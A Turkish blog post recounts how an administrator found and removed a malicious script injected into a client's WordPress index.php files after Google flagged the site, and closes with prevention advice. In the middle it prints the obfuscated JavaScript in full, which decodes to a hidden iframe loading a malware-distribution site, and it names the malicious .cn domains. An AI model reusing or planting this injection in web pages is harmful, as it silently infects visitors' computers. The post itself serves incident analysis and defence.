Merhaba arkadaşlar bugün sizlere zararlı bir kodun bilgisayarınıza ve internet sitenize neler yapacağından bahsetmek istiyorum.
Dün bir kunnanıcım bana mail attı. İnternet sayfasına girildiği zaman “Saldırgan olarak bildirilmiş site!” uyarısı ile karşılaştığını söyledi. Hemen girdim karşıma gelen uyarı mesajı
Saldırgan olarak bildirilmiş site!
www.xxx.com konumundaki sitenin saldırı sitesi olduğu bildirildi ve açılması güvenlik tercihlerinize dayanılarak engellendi.
Saldırı sitesi olarak tanımlanan siteler özel bilgilerinizi çalan, bilgisayarınızı başkalarına saldırı amacıyla kullanan ya da sisteminize zarar veren programları kurmaya çalışan sitelerdir.
Bazı saldırı siteleri zararlı yazılımları bilerek dağıtırken, çoğu site, sahibinin bilgisi ve izni dışında bu amaçla kullanılır.
Bu hata mesajını Google Toolbar çıkartmakta. Bir an şaşırdım bir XXX firmasının internet sayfasına Google Toolbar neden saldırgan bir site olarak algılasın ki ? Kurulu sistem Wordpress altyapısına sahip hemen XXX Bey’den internet sitesinin şifrelerini aldım.
Kodları incelediğimde index.php sayfasının en altında yabancı bir koda rastladım. Bu kod aslında şifrelenmiş bir java script kodu.
Zararlı Javascript kodu :
<!-- ad -->
<script type="text/javascript">
function jgouxhcixerkio(gqnfvwqckkaxvgg){var xlwqrzxo="";
for(mxkoehci=0;mxkoehci<gqnfvwqckkaxvgg.length;mxkoehci+=2)
{xlwqrzxo+=(String.fromCharCode(parseInt(gqnfvwqckkaxvgg.substr(mxkoehci,2),16)));}
document.write(xlwqrzxo);}jgouxhcixerkio(
"3C696672wqxeru61wqxeru6Dwqxeru65wqxeru20wqxeru737263wqxeru3D22wqxeru68wqxeru74747
0wqxeru3Awqxeru2F2Fwqxeru676Fwqxeru6Fwqxeru67wqxeru6C652Dwqxeru73wqxeru746174
732E636E2F7371wqxeru6Cwqxeru2Fwqxeru69wqxeru6Ewqxeru2Ewqxeru636769wqxeru3F
wqxeru646566wqxeru6175wqxeru6C7422wqxeru206672wqxeru61wqxeru6D65626Fwqxer
u72wqxeru6465wqxeru723Dwqxeru22wqxeru30wqxeru222062wqxeru6Fwqxeru7264wqxeru6
5wqxeru72wqxeru3Dwqxeru2230222077wqxeru69wqxeru6474683Dwqxeru22wqxeru302220
6865wqxeru69676874wqxeru3Dwqxeru22wqxeru30wqxeru22wqxeru2073wqxeru74wqxeru
79wqxeru6C65wqxeru3Dwqxeru22706Fwqxeru73wqxeru6974wqxeru696Fwqxeru6E3A2061wqxer
u62wqxeru736Fwqxeru6C7574653Bwqxeru20wqxeru76wqxeru6973wqxeru6962696Cwqxeru
69wqxeru74wqxeru79wqxeru3A20wqxeru68wqxeru69wqxeru6464656E3Bwqxeru20wqxeru64wqxer
u69wqxeru73wqxeru706Cwqxeru61wqxeru79wqxeru3A206Ewqxeru6F6E65wqxeru223E3C2Fwqxeru69
wqxeru66wqxeru7261wqxeru6D653Ewqxeru".replace(/wqxeru/g, ""));</script>
<!-- /ad -->
Kodu decode ettiğimde karşıma javascript ile yazılmış bir bağlantı scripti olduğunu fark ettim. Bu script sayesinde kurbanın internet sayfasında dirty-boy.cn, my-redsea.cn, goooglestat.cn internet adreslerine otomatik bağlantı vermekte ve tüm index.php index.html dosyalarına bulaşmakta olduğunu gördüm.
Uzun bir arayış sonrası </html> kodundan sonra tek satır halindeki bu kodu gördüğüm iyi oldu diyebilirim.
Bu verilmiş olan 3 bağlantı adresi Google tarafından kullanıcıya zarar veren 3. parti yazılımlar ve virüslerle sisteme bulaşan kullanıcı isteği dışında program yükleten siteler olarak belirlenmiş. Tabi ki bu tip siteler ve onlara bağlantı verenlere Google iyi gözle bakmaz. Böyle ana sayfadan direkt olarak kullanıcıya
Saldırgan olarak bildirilmiş site!
olarak uyarı verir. Google de olmasa halimiz yalan … 
Neyse konuyu dağıtmadan devam edeyim.
Google arama motoru internet sayfalarını indexlerken aradan bizim çöplük diye hitap ettiklerimizi ayırmaya çalışır.
Google bu siteyi ziyaret ettiğinde ne oldu?
Geçtiğimiz 90 gün içinde bu sitede test ettiğimiz 537 sayfadan 26 sayfanın, kullanıcının rızası olmadan kötü amaçlı yazılım indirilmesine ve yüklenmesine neden olduğu saptanmıştır. Google, bu siteyi en son 2008-11-19 tarihinde ziyaret etmiş ve bu sitede en son 2008-11-19 tarihinde şüpheli içerik bulunmuştur.Kötü amaçlı yazılımlara örnek olarak şunları verebiliriz: 2 trojan(s). Başarıya ulaşan kötü amaçlı yazılımlar, hedef makinede ortalama 3 yeni işleme yol açtı.
Kötü amaçlı yazılım dirty-boy.cn, my-redsea.cn, goooglestat.cn alan adları da dahil 3 alanda barındırılıyor.
google-stats.cn, egypt-shop.cn, goooglestat.cn alan adları da dahil olmak üzere 3 alanın, bu sitenin ziyaretçilerine kötü amaçlı yazılım dağıtılmasına aracılık ettiği saptanmıştır.
XXX Türkiye internet sayfasının FTP şifrelerini aldım ve hemen işe koyuldum tüm klasörleri tek tek inceledim ve içlerindeki index.php ve index.html sayfalarının kaynak kodlarındaki bu zararlı yazılımı uçurdum. Sistemi son olarak test ettim ve temiz …
Bu duruma yol açabilecek nedenler :
1. Kullandığını tema dosyalarını lütfen temanın orjinal adresinden yada güvenilir internet sitelerinden indiriniz.
Çünkü oradan buradan indirdiğiniz dosyalara bu tip zararlı kodlar enjekte edilmiş veya bulaştırılmış olabilir. Korsan CD gibide düşünebilirsiniz.
2. Bilgisayarınıza indirdiğiniz linsanssız veya Free (bedava) yazılımlardan sisteminize bir virüs bulaşabilir ve internet sitenizin FTP sine bu virüsü kendi ellerinizle gönderebilirsiniz.
Lütfen internetten indirdiğinizi dosyaları iyi bir trojan ve antivirüs programları tarafından taratınız. Güvenilmeyen sitelerden dosya indirmeyiniz …
3. FTP şifreleriniz çok basit olabilir ve kötü niyetli kişiler tarafından internet sayfanıza bu tip zararlı kodlar eklenilebilir.
Lütfen altyapınızı (joomla, Wordpress gibi) en son sürümüne güncelleyin ve FTP şifrelerinizi tahmin edilemeyecek karakterlerden oluşturunuz.
Peki bu uyarı nasıl gidecek ? Sürekli kullanıcı kaybediyorum..!
Google 90 gün içerisinde tekrar tekrar internet sayfanızı gelip inceler eğerki 90 gün içerisinde zararlı bir kod, virüs yada trojan bulamazsa yada bu tip sitelere link yoksa yani internet sayfanız 90 gün temiz kalırsa Google bu uyarıyı otomatik olarak kaldıracaktır. Sistem tekrar eski haline dönecektir.
